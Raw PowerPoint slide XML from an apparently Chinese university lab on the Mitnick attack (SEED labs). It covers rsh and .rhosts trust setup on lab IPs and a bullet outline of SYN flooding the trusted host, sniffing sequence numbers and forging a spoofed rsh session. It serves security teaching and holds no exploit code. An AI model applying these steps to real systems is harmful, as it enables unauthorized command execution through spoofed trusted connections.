                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEA294B5-594F-4255-801B-13BF2402B063}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5868144" y="3963634"/>
            <a:ext cx="2880320" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>序列号猜测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN-Flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5064208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4FBE8F-1D34-4551-88A3-2EF05870F7B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8366FAEA-E67A-4134-8B09-EC842A2FFDB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-redone-client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-redone-server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在服务器对应用户目录，添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，将信任主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写入该文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="471170" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>172.17.0.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>172.17.0.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为信任主机，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件中添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>172.17.0.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在信任主机上运行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>remote_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471170" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  比如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 172.17.0.3 date</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78522883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20B8C8-C77C-4A9D-8B17-8CB1E2E5F9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Mitnick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击实施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF42F7F-E179-4E73-A057-F2E823ABBFC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN-Flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>断开信任主机的网络</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为了不影响目标机发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN+ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，在目标机上静态设置信任主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>序列号猜测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sniffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建欺骗性的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报文，了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话的特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="473517232"/>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5CEA7C-7EF4-4BCF-B7F7-BD3753D0E1E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213AB8AB-1C2A-4B65-BC85-5E82B6E366A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1772816"/>
            <a:ext cx="8028343" cy="4392488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86762091"/>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E3B87A-5DFB-49F7-9A68-935B5BE16BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C3F682E-FC41-4F4E-A55E-FFA21EC843CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二个连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行命令返回结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A39DBD4-8BC1-4A17-A561-755F0ACCD393}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="648624" y="2425738"/>
            <a:ext cx="7846751" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A759DD1B-F50B-439A-85C3-BE125265DEB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="4293096"/>
            <a:ext cx="7792668" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3316228763"/>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4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实验要求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>按照实验指导手册，使用本实验提供的虚拟机完成实验内容。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过实验课的上机实验，回答超星平台的问题，提交作业。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本次实验不需要提交报告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>保存实验过程中的截包数据和屏幕截屏，超星平台作业需要提交。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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D85303-1C0A-4942-A49C-DD8EA515FC7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考资料：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A70162A-6145-4BAC-A53F-70ECDE72090E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>杜文亮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机安全导论：深度实践</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高等教育出版社</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SEED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验室网站：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a: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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>seedsecuritylabs.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中文手册</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
